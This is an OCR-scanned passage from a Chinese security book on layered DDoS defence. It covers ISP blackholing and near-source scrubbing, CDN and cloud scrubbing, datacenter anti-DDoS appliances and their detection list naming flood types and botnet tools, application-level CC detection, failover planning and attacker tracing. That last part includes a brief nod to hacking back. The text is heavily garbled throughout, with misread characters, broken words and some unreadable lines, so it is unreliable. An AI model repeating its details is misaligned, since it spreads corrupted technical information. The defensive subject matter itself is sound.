第 一 EB: ISP, 

近 源 清洗 
/ /CDN 硬 搞 
第 三 层 : DC 级 
近 目 的 清洗 


图 7-10 DDoS 纵深 防御 体系 


这 4 层 不 是 严格 意义 上 的 纵深 防御 结构 ， 也 不 是 在 所 有 的 防御 中 都 
需要 4 层 ， 可 能 有 时 候 只 需要 其 中 的 2 层 。 但 对 于 超大 流量 攻击 而 言 ， 
就 是 需要 4 层 防 御 机 制 ， 再 没有 其 他 手段 了 。 跟 厂商 的 市 场 宣传 可 能 有 
所 不 同 ， 大 流量 攻击 的 防护 并 不 是 靠 厂 商 单方 面 融 能 解决 ， 而 是 进行 
多 层 防御 才 有 效 。 


1.ISP/WAN]= 


这 一 层 通 闻 对 最 终 用 户 不 可 见 ， 如 条 只 是 中 小 企业 ， 那 这 一 层 可 
能 真 的 不 会 接触 到 。 但 如 琳 是 大 型 互联 网 公司 、 公 有 云 厂 商 ， 甚 至 是 
云 清洗 上 商 ， 这 层 是 必 不 可 少 的 。 因 为 当 流量 超过 目 己 能 处 理 的 极限 
时 ， 必 须要 借助 电信 运 东 商 的 能 力 。 大 型 互联 网 公司 虽然 目 身 储备 的 
带 视 比较 大 ， 但 还 没 到 达 轻 松 抵抗 大 流量 DDoS 的 程度 ， 毕 竟 带 宽 是 所 
有 IDC 成 本 中 最 贵 的 资源 ， 没 有 之 一 。 目 前 无 论 是 云 计算 厂商 、 大 型 互 
联网 公司 向 外 宣称 的 成 功 抵御 200G 以 上 攻击 的 新 闻 背 后 都 用 到 了 运营 
商 的 抗 D 能 力 ， 男 外 像 第 三 方 的 云 清 尝 平 台 实际 上 或 多 或 少 地 依赖 电信 
运 膏 商 ， 如 末 只 依靠 本 和 喘 的 清洗 能 力 ， 部 是 非 肖 有 限 的 。 


目前 ， 中 国电 信和 专门 做 抗 DDoS 的 云 坦 提供 了 “流量 压制 ?和 “ 近 源 清 
尝 ” 的 服务 (如 图 7-11 所 示 ) ， 流 量 压制 是 一 种 分 方向 的 黑洞 路 由 ， 对 
于 购买 其 服务 的 三 商 来 说 可 以 目 定 义 需 要 黑洞 路 由 的 IP， 并 选择 在 哪 
些 国家 及 省 份 上 生效 ， 如 图 7-12 所 示 。 黑 洞 路 由 十 一 种 位 香 粗 歇 的 方 
法 ， 除 了 攻击 流量 ， 部 分 真实 用 户 的 访问 也 会 被 一 起 黑洞 控 ， 对 用 户 


体验 是 一 种 打折 扣 的 行为 。 但 因为 攻击 流量 分 布 与 业务 流量 分 布 往往 
区 别 较 大 ， 根 据 受 攻击 时 ， 业 务 与 攻击 流量 具体 分 布 ， 在 某 些 攻击 流 
量 特别 大 而 用 户 流量 极 小 的 方向 上 进行 黑洞 路 由 ， 可 以 在 保证 大 部 分 
业务 前 提 下 解决 边缘 带宽 拥塞 问题 ， 这 对 具备 一 定 带 宽 储 备 和 请 洗 能 
力 但 仍 需 保 证 出 口 带宽 的 云 清洗 厂商 特别 有 意义 ， 对 中 小 型 网 站 用 户 
体验 影响 较 大 。 


Al7-11 ” 近 源 清洗 示意 图 
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Al7-12 ”电信 云 堤 移动 端 管理 界面 


相 比 之 下 ， 近 源 清洗 可 以 在 靠近 攻击 源 位 置 对 攻击 进行 清洗 ， 在 
几乎 不 增加 时 延 的 前 提 下 完成 流量 清洗 。 这 种 对 攻击 流量 的 牵引 、 清 
洗 、 回 注 的 防御 方式 对 用 户 体验 的 挑战 没 那么 大 ， 但 是 跟 黑 洞 路 由 比 
防御 方 的 成 本 比较 高 ， 且 触发 到 响应 的 延 时 较 大 。 


在 运营 商 防 御 这 一 层 的 主要 的 参与 者 是 大 型 互联 网 公司 、 公 有 云 
厂商、 云 清 洗 厂 商 ， 其 最 大 的 意义 在 于 应 对 超过 自身 带宽 储备 和 自身 
DDoS 防御 能 力 之 外 的 超大 攻击 流量 时 作为 补充 性 的 缓解 措施 。 


2.CDN/Internet= 


CDN 并 不 是 一 种 抗 DDoS 的 产品 ， 但 对 于 Web 类 服务 而 言 ， 却 正好 
有 一 定 的 抗 DDoS 能 力 。 以 大 型 电 商 的 抢购 为 例 ， 这 个 活动 的 访问 量 非 
常 大 ， 从 很 多 指标 上 看 不 亚 于 DDoS 的 CC， 而 在 平台 侧 实 际 上 在 CDN 
层面 用 验证 码 过 滤 了 绝 大 多 数 请 求 ， 最 后 到 达 数 据 库 的 请 求 只 占 整体 
请 求 量 的 很 小 一 部 分 。 


对 HTTP CC 类 型 的 DDoS， 不 会 直接 到 源 站 ，CDN 会 完 通过 目 身 的 
带宽 硬 抗 ， 抗 不 了 的 或 者 穿 透 CDN 的 动态 请 求 会 到 源 站 ， 如 果 源 站 前 
端的 抗 DDoS 能 力 或 者 源 站 前 的 带宽 比较 有 限 ， 就 会 被 彻底 DDoS 。 


云 清 洗 厂 丙 提 出 的 策略 是 ， 预 完 设置 好 网 站 的 CNAME， 将 域名 指 
癌 云 清洗 厂商 的 DNS 服 务 器 ， 在 一 般 情 况 下 ， 云 清 尝 厂商 的 DNS 仍 将 
罕 透 CDN 的 回 源 的 请 求 指向 源 站 ， 在 检测 到 攻击 发 生 时 ， 域 名 指 疝 目 
己 的 清 尝 集群 ， 然 后 再 将 清洗 后 的 流量 回 产 ， 检 测 方 式 主要 是 在 客户 
网 站 前 部 署 反 回 代理 (Nginx) ， 托 管 所 有 的 并 发 连接 。 在 对 攻击 流量 
进行 分 流 的 时 候 ， 准 备 好 一 个 域名 到 IP 的 地 址 池 ， 当 也 被 攻击 时 封禁 并 
局 用 地 址 池 中 的 下 一 个 IP， 如 此 往复 。 


以 上 是 类 Cloudflare 的 解决 方案 ， 国 内 云 清洗 厂商 的 实现 原理 都 相 
似 ， 如 图 7-13 所 示 。 


80Gbps 的 DDoS 
清洗 中 心 


图 7-13 ” 云 清 洗 示 意图 


不 过 这 类 方案 都 有 一 个 通病 ， 由 于 国内 环境 不 文 持 anycast， 通 过 
DNS 引流 的 方式 需要 比较 长 的 生效 时 间 ， 这 个 时 间 依 赖 于 DNS 递归 生 
效 的 时 长 ， 对 自身 完全 不 可 控 ， 很 多 用 户 使 用 的 DNS 递归 服务 器 最 小 
TTL 值 长 达 24 小 时 。 同 时 CDN 仅 对 Web 类 服务 有 效 ， 对 游戏 类 TCP 直 连 
的 服务 无 效 。 


网 上 很 多 使 用 此 类 抗 D 服 务 的 过 程 可 以 概括 为 一 句 话 : 更 改 
CNAME 指 癌 ， 等 待 DNS 递归 生效 。 


SC 层 


Datacenter 这 一 层 的 DDoS 防御 属于 近 目 的 清洗 ， 就 是 在 DC 出 口 的 
地 方 部 署 ADS 设 备 。 


品 照 片 如 图 7-14 所 示 。 


AntiDDoS8030 AntiDDoS8080 AntiDDoS8160 


图 7-14 “华为 AntiDDoS 8000 系 列 产品 


目前 国内 厂商 华为 的 AntiDDoS 产 品 的 最 高 型 号 支持 T 级 高 达 
1440Gbps 带 宽 的 防护 ， 产 品系 列 如 图 7-14 所 示 。DC 级 清晰 方案 的 原理 
如 图 7-15 所 示 ， 在 DC 出 口 以 镜像 或 分 光 部 署 DDoS 探 针 (检测 设备 ) ， 
当 检测 到 攻击 发 生 时 ， 将 流量 牵引 到 旁 路 部 署 的 DDoS 清洗 设备 ， 再 将 
经 过 清洗 的 正常 流量 回 注 到 业务 主机 ， 以 此 完成 一 轮 闭环 。 
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图 7-15 “DC 级 清洗 方案 


部 署 设 备 本 身 并 没有 太 大 的 技术 含量 ， 有 技术 侣 量 的 部 分 都 已 经 
作为 防御 算法 封装 在 产品 盒子 里 了 。 不 过 要 指出 的 一 点 是 ， 目 前 市 场 
上 的 ADS 盒 子 既 有 的 算法 和 学 习 能 力 是 有 限 的， 仍然 需要 人 的 介入 ， 
比如 : 


.对 业务 流量 基线 的 目 适应 学 习 能 力 是 有 限 的 ， 例 如 电 商 行业 双 11 
大 促 日 子 的 流量 模型 可 能 就 超越 了 ADS 的 学 习 能 力 ， 正 常 流 量 已 经 触 
发 攻击 判定 。 


-自动 化 触发 机 制 建立 在 国 值 之 上 ， 融 意味 着 不 是 完全 的 自动 化 ， 
因为 国 值 是 一 个 经 验 和 业务 场景 相关 的 值 。 


全 局 策略 是 通用 性 集 上 略 ， 不 能 对 每 一 个 子 业 务 起 到 很 好 的 防御 效 
果 ， 有 可 能 子 业务 已 经 被 D 了 ， 全 局 策略 还 没 触 发 。 


常见 的 DDoS 类 型 ADS 可 以 自动 处 理 ， 但 变换 形式 的 DDoS 类 型 可 


能 还 需要 人 工 识别 。 
.默认 的 模板 策略 可 能 不 适用 于 某 些 业务 ， 需 要 目 定 义 。 


DDoS 防御 除了 整体 架构 设计 外 ， 比 较 需 要 专业 技能 的 地 方 就 是 在 
上 述 例 子 的 场景 中 。 目 前 在 ADS 设 备 里 履 盖 了 3~4、7 这 三 层 的 解决 方 
案 。 表 7-2 是 常见 ADS 设 备 的 功能 简介 © 


表 7-2 常见 ADS 设 备 功能 


IPv4 威胁 防御 类 型 


异常 过 滤 


黑 名 单 / 基 于 HTTP 协议 字段 的 过 滤 /TCP/UDP/other 协议 负载 特征 过 滤 


协议 漏洞 威胁 防护 


IP Spoofing, LAND 攻击 、Fraggle M i, Smurf t 击 、Winnuke 攻 iH, Ping of 
Death Wit, Tear Drop 攻击 、IP Option 控制 攻击 、IP 分 片 控制 报 文 攻击 、TCP 标记 
合法 性 检查 攻击 、 超 大 ICMP 控制 报 文 攻击 、ICMP 重 定向 控制 报 文 攻击 、ICMP 不 
可 达 控 制 报 文 攻击 等 


传输 层 威胁 防护 


SYN flood 攻击、ACK flood 攻击 、SYN-ACK flood 攻击 、FIN/RST flood 攻击 、 
TCP fragment flood 攻击 、UDP flood 攻击 、UDP fragment flood 攻击 、ICMP flood 
等 


扫描 窥探 型 威胁 防护 


端口 扫描 攻击 、 地 址 扫描 攻击 、TRACERT 控制 报 文 攻击 、IP 源 站 选 路 选项 攻击 、 
IP 时 间 蕉 选项 攻击 、IP 路 由 记录 选项 攻击 等 


DNS 威胁 防护 


Web 威胁 防护 


VOIP 威胁 防护 


虚假 源 DNS query flood 攻击 、 真 实 源 DNS query flood 攻击 、DNS reply flood 攻 
击 、DNS 缓存 投 毒 攻击 、DNS 协议 漏洞 攻击 等 

HTTP get /post flood 攻击 、CC 攻击 、HTTP slow header/post 攻击 、HTTPS flood 
Wik, SSL DoS/DDoS Wik, TCP 连接 耗 尽 攻击 、Sockstress 攻击 、TCP 重 传 攻击 、 
TCP 空 连接 攻击 等 

SIP flood 


僵 木 蠕 威胁 防护 


200+ 流 行 僵尸 木马 蠕虫 防护 ， 如 : LOIC、HOIC、Slowloris、Pyloris、Http- 
DosTool, Slowhttptest, The-ssl-dos, MEF. JHB DDOS、 风 云 白 金 、 小 鱼 重 装 
等 主流 僵尸 网 络 工具 


IPv6 威胁 防御 类 型 
IPv6 威胁 防御 类 型 


ICMP Fragment 报 文 攻击 、 黑 名 单 过 滤 、 基 于 HTTP 协议 字段 的 过 滤 、 支 持 
TCP/UDP/other 协议 负载 特征 过 滤 、SYN flood 攻击、ACK flood 攻击、SYN-ACK 
flood 攻击 、FIN/RST flood 攻击 、TCP fragment flood 攻击 、UDP flood 攻击 、UDP 
fragment flood 攻击 、ICMP flood 攻击 、 虚 假 源 DNS query flood 攻击 、 真 实 源 DNS 
query flood 攻击 、DNS reply flood 攻击 、DNS 缓存 投 毒 攻击 、DNS 协议 漏洞 攻击 、 
Fast flux {F Ri, HTTP get /post flood 攻击 、CC 攻击 .HTTP slow header/post 攻击 、 
HTTPS flood 攻击 、SSL DoS/DDoS 攻击 、TCP 连接 耗 尽 攻击 、Sckstress 攻击 、TCP 
重 传 攻击 、TCP 空 连接 攻击 、SIP flood 等 


IPv4/IPv6 双 栈 防御 


支持 


一 般 情 况 下 ADS 设 备 可 以 缓解 大 部 分 常见 的 DDoS 攻击 类 型 ， 相 对 
而 言 3-4 层 的 攻击 手法 比较 固定 ， 而 7 层 的 攻击 ， 由 于 涉及 的 协议 较 多 ， 
手法 变化 层出不穷 ， 所 以 ADS 有 时 候 对 7 层 的 防护 做 不 到 面面俱到 ， 比 
如 对 CC，ADS 提 供 了 HTTP 302、 验 证 码 等 ， 但 还 是 不 能 很 好 地 解决 这 
个 问题 。 应 用 层 的 防护 需要 结合 业务 来 做 ，ADS 则 在 能 利用 的 场景 


ARTA IA, COR PR AL A, A A packets 
的 方式 ，ADS 在 客户 并 和 服务 端 中 间 鉴 别 流入 的 数据 包 古 否 包含 指 
Bf ° 


4.0S/APP = 


这 是 DDoS 的 最 后 一 道 防线 。 这 一 层 的 意义 主要 在 于 漏 过 ADS 设 备 
的 流量 做 最 后 一 次 过 滤 和 绥 解 ， 对 ADS 防 护 不 了 的 应 用 层 协议 做 补充 
防护 。 比 如 NTP 有 反射 ， 可 以 通过 服务 紫 配 置 蔡 用 monlist， 如 来 不 提供 
基于 UDP 的 服务 ， 可 以 在 边界 上 直接 阻 断 UDP 协 议 。 


互联 网 在 线 服务 中 最 大 的 比重 就 是 Web 上 服务， 因此 有 些 互联 网 公司 
喜欢 自己 在 系统 层面 去 做 应 用 层 的 DDoS 防护 ， 例 如 对 抗 CC， 有 时 这 些 
功能 也 能 顺带 关联 到 业务 安全 上 ， 比 如 针对 黄牛 抢 单 等 。 


实现 方式 可 以 是 web 服务 器 模块 ， 也 可 以 是 独立 部 署 的 旁 路 系统 ， 
有 反问 代理 将 完整 的 HTTP 请 求 转发 给 检测 服务 右 ， 检 测 服 务 絮 根据 几 方 
面 的 信息 ， 如 图 7-16 所 示 : 


:来 自 相 同 IP 的 并 发 请 求 。 
.相同 ip+cookie 的 并 发 请 求 。 


-相同 HTTP 头 部 可 设置 字段 。 


-相同 的 request URL ° 


P P 相同 HTTP 
相同 IP 相同 cookie 头 部 字段 


CC 检测 模块 


图 7-16 七 层 HTTP 抗 DDoS 示意 图 


APP 服务 器 


然后 保存 客户 端的 连接 信息 计数 表 ， 例 如 单位 时 间 内 相同 
IP+cookie 再 次 发 起 连接 请 求 则 此 客户 端 耻 的 计数 右 +1， 直 到 触发 冰 
值 ， 然 后 服务 此 会 进行 月 断 。 为 了 避免 误杀 ， 也 可 以 选择 性 地 弹出 验 
证 码 。 


以 上 是 拿 CC 防 御 举 了 个 例子 ，ADS 设 备 本 身 提 供 了 HTTP 302 跳 
转 、 验 证 码 、Java-Script 解 析 等 防御 方式 ， 尽 管 OS 和 应 用 层 可 以 做 更 多 
的 事情 ， 但 毕竟 有 上 自己 去 开发 和 长 期 维护 的 代价 ， 这 个 收益 要 看 具体 
情况 。 


大 部 分 介绍 DDoS 防御 策略 的 文章 里 似乎 很 少 提 及 这 一 点 : 增加 带 
宽 ， 但 这 个 方法 却 是 以 上 所 有 防御 的 基础 ， 例 如 第 二 层次 的 CDN 实 际 
上 就 是 拼 带 视 ， 很 多 大 型 企业 选择 上 自 建 CDN， 本 质 上 就 是 上 自己 增加 之 
宽 的 行为 。 除 了 CDN 之 外 ， 权 保障 DC 出 口 的 多 ISP 链 路 、 备 份 链 路 ， 
到 下 层 机 柜 交 换 机 的 带宽 都 不 存在 明显 的 单 点 瓶 颈 ， 否 则 抗 DDoS 的 处 
理性 能 够 了 ， 但 是 流量 流 经 某 个 节点 时 突然 把 一 个 杂牌 交换 机 压 垮 
了 ， 最 后 的 结果 还 是 表现 为 有 问题 。 


对 运 维 经 验 成 熟 的 互联 网 公司 而 证， 一 般 都 有 能 容 管 理 ， 对 于 促 
销 活动 ， 高 峰 时 段 的 带宽 ，IDC 资 源 的 波峰 波 谷 都 有 预先 的 准备 ， 
DDoS 防御 主要 是 消除 这 些 网 络 方案 中 内 在 的 单 点 瓶颈 。 


7.2.3 ”不 同类 型 的 企业 


DDoS 的 防御 本 质 上 属于 资源 的 对 抗 ， 完 整 的 4 层 防 御 效 果 虽 好 ， 
但 有 一 个 明显 问题 融 是 TCO， 这 种 成 本 开销 互联 网 行业 排名 TOP10 以 外 
的 公司 基本 都 吃不消 。 束 算 付 得 起 这 钱 ， 在 IT 整 体 投 资 的 占 比 会 显得 
过 高 ， 付 得 起 不 代表 这 种 投资 是 正确 的 。 所 以 针对 不 同 的 企业 分 别 描 
述 DDoS 缓 解 方案 的 倾 问 和 选择 性 。 


这 里 的 “大 ”有 以 下 几 层 意思 


公司 很 有 钱 ， 可 以 在 补贴 具体 的 业务 上 不 “ 太 ” 计 较 投 入 ， 对 土 聚 
来 说 只 选 效 果 最 优 方案 。 


公司 不 一 定 处 在 很 赚钱 的 阶段 ， 但 IDC 投 次 规模 足够 大 ， 这 样 为 
了 保障 既 有 的 投入 ， 安 全 的 总 投资 维持 一 个 固定 百分比 也 是 非常 有 必 
要 的 ， 在 IDC 僵 子 很 大 的 时 候 没 必要 省 “小 钱 ”。 


与 潜在 的 由 于 服务 中 断 造成 的 损失 比 ，DDoS 防 御 的 投资 可 以 忽略 
不 计 。 


轴 射 到 现实 中 与 这 几 条 相关 的 公司 : 
:市 值 100 亿 美元 以 上 互联 网 公司 。 
:大 型 公有 云 厂 两 ，IaaS、PaaS 平 台 。 


利润 比较 高 的 业务 ， 比 如 游戏 、 在 线 文 付 假如 被 DDoS 的 频率 较 


all 
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运营 商 ， 大 力 建 机 房 "， 在 拥有 全 部 的 DDoS 防御 机 制 的 前 提 下 ， 不 断 
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高 的 公司 而 言 ， 抗 DDoS 是 有 先天 优势 的 ， 因 为 业务 急速 增长 而 带 来 的 


基础 设施 的 扩容 无 意识 则 就 成 了 一 种 防御 能 力 。 但 对 于 没有 那么 大 业 


务 流量 的 公司 ， 空 买 一 堆 带宽 烧 钱 狼人 也 没 人 愿意 。 


对 于 比较 有 钱 ， 但 没 那 么 多 线 上 服务 器 的 公司 而 言 ， 目 己 投 入 太 
多 IDC 建 设 可 能 是 没 必 要 的 ， 此 时 应 该 转向 通过 购买 的 手段 尽 可 能 获得 
全 部 的 DDoS 防御 机 制 。 


2. 中 小 企业 


质 源 的 对 抗 肯定 不 是 中 小 企业 的 强项 ， 所 以 追求 ROI 且 主要 的 抗 
DDoS 守 上 略 。 第 一 种 情况 极度 省 钱 模式 ， 平 时 裸奔 ， 直 到 受 攻击 才 找 搞 
DDoS 厂 次 临时 引流 ， 这 种 方案 效 末 莽 一 点 ， 但 绝 大 多 数 企 业 都 古 这 种 
心理 ， 得 过 且 过 ， 能 省 则 省 ， 这 也 无 可 厚 非 ， 不 过 遇 到 关键 事件 要 知 
道上 哪儿 去 找 谁 ， 知 道 做 哪些 事 。 


第 二 种 情况 追求 效果 ， 硕 望 有 性 价 比 高 的 方案 。 如 果 本 身 业 务 运 
行 于 公有 云 平 台 ， 可 以 直接 使 用 云 平 台 提 供 的 抗 DDoS 能 力 ， 对 于 Web 
类 企业 可 以 考虑 提前 购买 云 清 尝 三 商 的 服务 。 


7.2.4 不 同类 型 的 业务 


不 同 的 类 型 的 服务 所 需要 的 DDoS 防 御 机 制 不 完全 相同 ， 所 以 不 能 
直接 拿 前 述 4 层 生 搬 硬 套 。 


1.Web 


对 于 Web 类 服务 ， 攻 击发 生 时 终端 用 户 可 以 有 一 定 的 延迟 容忍 ， 在 
防御 机 制 上 4 层 全 部 适用 ， 大 型 平台 的 一 般 都 是 4 层 全 部 拥有 ， 规 模 小 
一 点 的 企业 一 般 购 买 云 清洗 ，cloudflare 类 的 服务 即 可 。 


2. 游 戏 类 


Web API 形 式 的 轻 游 戏 跟 Web 服 务 类 似 ， 而 对 于 TCP socket 类 型 的 
大 型 网 游 ， 稍 有 延迟 很 影响 用 户 体验 ， 甚 至 很 容易 掉 线 。 云 WAF、 
CDN 等 措施 因为 是 针对 Web 的 ， 所 以 在 该 场景 下 无 效 ， 只 有 通过 DNS 
引流 和 ADS 来 清洗 。ADS 不 能 完美 防御 的 部 分 可 以 通过 修改 客户 端 、 
服务 端的 通信 协议 做 一 些 辅 助 性 的 小 动作 ， 例 如 封包 加 tag 标 签 ， 检 测 
到 没有 tag 的 包 一 律 丢 痉 ， 防 御 机 制 基本 都 依赖 于 信息 不 对 称 的 小 技 
巧 。DNS 引 流 的 部 分 对 于 有 HTTPDNS 的 厂商 可 以 借助 其 缓解 DNS 递归 
生效 的 时 间 。 


7.2.5 ”服务 策略 


分 级 案 上 略 一 一 对 于 平台 而 言 ， 如 琳 有 些 服 务 被 DDoS 会 导致 全 站 服 
务 不 可 用 ,例如 DNS 不 可 用 则 相当 于 全 线 服务 不 可 用 ， 对 于 强 账号 体 
系 应 用 ， 例 如 电 商 、 游 戏 等 ， 如 果 SSO 登 录 不 可 用 则 全 线 服务 不 可 用 ， 
攻击 者 只 要 击 垮 这 些 服 务 就 能 做 到 “ 擒 贼 擒 王 ”。 所 以 安全 上 也 需要 考 


虚 针 对 不 同 的 闹 产 使 用 不 同等 级 的 保护 策略 ， 根 据 BCM 的 要 求 ， 先 将 
质 产 分 类 分 级 ， 划 分 出 不 同 的 可 用 性 SLA 要 求 ， 然 后 根据 不 同 的 SLA 实 
施 不 同 级 别 的 防护 ， 在 具体 防护 策略 上 ， 能 造成 平台 级 SPOF ( 单 点 故 
障 ) 的 服务 或 功能 应 投入 更 高 成 本 的 防御 措施 ， 所 谓 更 高 成 本 不 仅 指 
购买 更 多 的 ADS 设 备 ， 同 时 可 以 建立 多 灾 备 节点 ， 并 且 在 监控 和 响应 
优先 级 上 应 该 更 高 。 


Failover 机 制 一 -DDoS 防御 不 只 是 依赖 于 DDoS 防御 的 那 4 层 手 
段 ， 同 时 依赖 于 基础 设施 的 强大 ， 例 如 做 分 流 ， 融 需要 多 点 异地 灾 
备 ，mirror site & hot site & standby system， 云 上 的 系统 需要 跨 AZ 音 
署 ， 这 些 是 可 以 随时 切换 的 基础 。 把 鸡蛋 放 在 一 个 篮子 里 会 导致 没 什 
么 选择 。 

基础 设施 和 应 用 层面 建立 见 余 是 技术 形式 上 的 基础 ， 光 有 这 些 还 


远 远 不 够 ,需要 有 与 之 配套 的 DRP&BCP 策 略 集 ， 并 且 需 要 真实 的 周期 
性 的 演练 ， 意 在 过 到 超大 流量 攻击 时 能 够 从 容 应 对 。 


.有 损 服 务 一 一 在 应 用 服务 设计 的 时 候 ， 应 该 尽量 避免 " 单 点 瓶 
贷 "”， 避 免 一 个 点 被 DDoS 了 整个 产品 吏 不 好 用 了 ， 而 是 希望 做 到 某 些 
服务 即使 关闭 或 下 线 了 ， 仍 然 不 影响 其 他 在 线 的 服务 (或 功能 ，， 能 
在 遇 到 需要 弃 蔡 保山 的 场景 时 有 可 以 “割肉 ?的 选择 ， 不 要 除了 “0? 束 
是 “1”， 还 是 要 存在 灰 度 ， 比 如 原来 10 个 服务 在 线 ， 明 到 攻击 时 我 只 
保底 重要 的 3 个 服务 在 线 即 可 。 
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WAY 1 Fl SCA DDOSAR eel) AGE Ae A SH Bl BEE — BA 
这 种 因素 通过 产品 设计 束 可 以 根治 。 而 有 很 多 应 用 层 DDoS 只 是 为 了 达 
成 另外 一 种 目的 ， 都 跟 上 述 4 层 纵深 防御 机 制 无 关 ， 而 跟 产 品 设 计 有 
关 。 所 以 防御 DDoS 这 事 得 看 一 下 动因 ， 不 能 言 目 应 对 。 


7.2.6 NIPS 场 景 


ADS 本 质 上 是 一 个 包 过 滤 设 备 ， 虽 功用 不 同 却 跟 IPS 有 点 相似 ， 之 
前 也 提 到 有 时 候 需 要 提供 全 站 IPS 的 虚拟 补丁 功能 ，ADS 设 备 就 可 以 充 
当 这 一 角色 ， 只 是 条 目 不 宜 多 ， 只 上 有 限 的 条 目 ， 下 面 的 是 NSFOCUS 
的 ADS 设 备 的 规则 编辑 界面 ，payload 可 自 定 义 ， 如 图 7-17 所 示 。 


当 安 全 团队 能 力 尚 可 的 话 ， 可 以 通过 运行 POC exploit， 然 后 抓 包 
找 出 攻击 payload 的 特征 ， 编 辑 16 进 制 的 匹配 规则 ， 即 可 简单 实现 人 工 


定制 。 


模式 匹配 规则 
添加 模式 匹配 
项 


_ | | BSP 
ARPA REE /F MS 
Bae 

源 IP 
IPA KE Te 


ORTER MKEO, 1ATOMRREAOHRES, SRR LRMAREA) 
eck $) 


= $) 
- $) 
O SYN OAKOFIN 2) RST (C2) URG (PSH 癌 不 进行 标记 位 检查 


( 字 节 )(0--1480) 
(F¥)(0--1480) 


|| ase $) 
(根据 特征 字符 类 型 输入 ， 十 六 进 鲍 支持 不 带 \X 形 式 的 输入 ， 格 式 如 "ababab" 或 "xabyab"， 并 遂宁 符 不 支持 起 "字符 及 x 字符 ) 


长 度 小 于 256 个 字符 
2015-08-22 21:14:31 


图 7-17 绿 盟 “黑洞 "规则 目 定 义 界面 


7.2.7 ”人 破 防 和 反 制 


从 安全 管理 者 的 角度 看 ， 即 便 是 拥有 完整 的 4 层 防御 机 制 也 并 非 无 
懈 可 击 ， 号 称 拥 有 400-500G 防 护 能 力 的 平台 是 完全 有 可 能 被 打垮 的 ， 
完全 的 防护 能 力 是 建立 在 人 、 策 略 、 技 术 手 段 都 生效 的 情况 才 有 的 ， 


如 果 这 些 环 市 出 了 问题 ， 抗 DDoS 的 整个 过 程 可 能 会 失败 。 例 如 下 面 提 


到 的 这 些 问题 : 


超大 流量 攻击 时 需要 用 到 黑洞 路 由 ， 但 黑洞 路 由 的 IP 需 要 由 防御 
方 定义 和 联动 ，“ 联 动 * 的 过 程 就 是 向 上 游 设备 发 送 封禁 IP 的 通知 ， 如 果 
接口 不 可 用 ， 那 么 此 功能 会 失效 ， 所 以 ISP 级 的 防御 是 有 失效 可 能 性 
的 。 


CDN 云 清洗 服务 依赖 于 清洗 服务 商 接管 域名 解析 ， 如 采 云 清洗 服 
务 商 本 喘 的 DNS 不 可 用 ， 也 将 导致 这 一 层面 的 防御 失效 ， 诸 如 此 类 的 
问题 还 有 不 少 ， 这 些 抗 D 厂 商 自 身 并 非 无 懈 可 击 。 


:ADS 平 时 不 一 定 串 联 部 署 ， 但 攻击 发 生 引流 后 一 定 是 业务 的 前 端 
设备 ， 假 如 这 个 设备 本 吴 存 在 DOS 的 可 能 ， 即 使 是 触发 了 bypass 也 相当 
于 防御 完全 失效 了 ， 为 一 方面 策略 下 发 通常 是 ADS 设 备 跟 管 理 六 点 互 
通 ， 如 来 管理 让 点 出 现 可 用 性 问题 ， 也 将 导致 ADS 防 御 的 一 系列 问 


题 。 


-超大 流量 攻击 需要 人 工 干预 时 ， 最 基本 的 需求 是 安全 或 运 维 人 员 
能 在 办 公 网 络 连 接 到 ADS 的 管理 丰 点 ， 能 远程 运 维 ADS 设 备 ， 如 采 此 
时 办 公 网 络 的 运 维 管理 链 路 出 现 故 障 ， 不 仅 切 晰 了 人 员 操作 ， 还 会 把 
现场 应 急 的 紧张 气氛 提升 一 个 量 级 ， 使 人 更 加 手忙脚乱 。 


以 上 并 不 在 于 提供 新 的 攻击 的 思路 ， 而 在 于 癌 抗 DDoS 方案 的 制定 
者 提供 另类 视角 以 便于 审视 方案 中 的 短 板 。 


7.2.8 ”立案 和 追踪 


目前 对 于 流量 在 100G 以 上 的 攻击 是 可 以 立案 的 ， 这 比 过 去 幸福 了 
很 多 。 过 去 没有 本 土 特色 的 资源 甚至 都 没 法 立案 ,但 


-在 海量 的 攻击 中 ， 寻 找 倒 推 的 线索 ， 找 出 可 能 古 C&C 服 务 占 的 IP 
或 相关 域名 等 。 


IER”, Sint CRCHRA A ° 


-通过 登录 IP 或 借助 第 三 方 APT 的 大 数据 资源 (如 果 你 能 得 到 的 
话 ) 物理 定位 攻击 者 。 


FERJET TIGE ° 
:上 法 性 诉讼 。 


如 有 条 抓 到 这 个 人 没有 特殊 吴 份 ， 也 许 你 能 如 愿 ， 但 假如 过 到 一 些 
特殊 人 物 ， 你 几 个 月 都 日 忙 乎 。 而 黑 吃 黑 的 能 力 则 依赖 于 安全 团队 本 
喘 的 渗透 能 力 ， 且 有 亲情 网 致 做 这 事 。 这 个 过 程 对 很 多 企业 来 说 成 本 


还 是 有 点 高 ， 光 有 实力 的 安全 团队 这 条 门槛 就 足以 砍 掉 绝 大 多 数 公 
司 。 笔 者 过 去 也 只 是 恰好 有 缘 遇 到 了 这 么 一 个 团队 。 


2015 H1 绿 盟 科 技 DDoS 威 胁 报告 


http://www.nsfocus.com.cn/upload/contents/2015/08/20150820101444 
_29653.pdf 


华为 AntiDDoS8000 DDoS 防御 系统 


http://e.huawei.com/cn/products/enterprise-networking/security/anti- 


ddos/8000 


7.3 链 路 劫持 


1.HTTPDNS 


运营 商 为 了 减少 跨 ISP 的 流量 结算 ， 会 在 本 网 内 缓存 ICP 的 内 容 ， 
盟 


广告 联盟 等 甚至 也 会 劫持 域名 替换 广告 ， 动 持 域名 解析 是 安全 上 的 一 
大 隐患 ， 和 意味 着 可 以 任意 操纵 缓存 ， 随 意 挂 马 。 


HTTPDNS 原 来 是 一 个 为 优化 用 户 体验 发 明 的 东西 ， 其 本 质 就 是 利 
用 HTTP 协 议 来 完成 域名 解析 ， 防 止 被 运营 商 劫持 ， 原 理 如 图 7-18 所 
示 。 通 常情 况 下 使 用 HTTPDNS 的 客户 端 域名 解析 会 走 互联 网 公司 自己 
的 服务 器 ， 跳 过 运营 商 的 本 地 DNS， 这 个 产品 原来 的 目的 虽然 不 是 为 
了 安全 设计 ， 但 从 安全 上 来 看 缓解 了 一 些 问题 。 当 然 并 不 是 绝对 的 ， 
HTTPDNS 的 请 求 由 于 是 明文 的 ， 理 论 上 完全 可 以 支持 。 只 不 过 劫持 的 
代价 比 原来 更 大 一 些 。 


运营 商 LocalDNS 服务 器 业务 授权 DNS 服务 器 


图 7-18 HTTPDNSŽ 


如 果 希 望 完全 规避 DNS 解 析 动 持 的 问题 ， 需 要 使 用 加 密 的 DNS 请 
求 ， 目 前 IETF 已 经 有 了 DNS over TLS 的 草案 : 
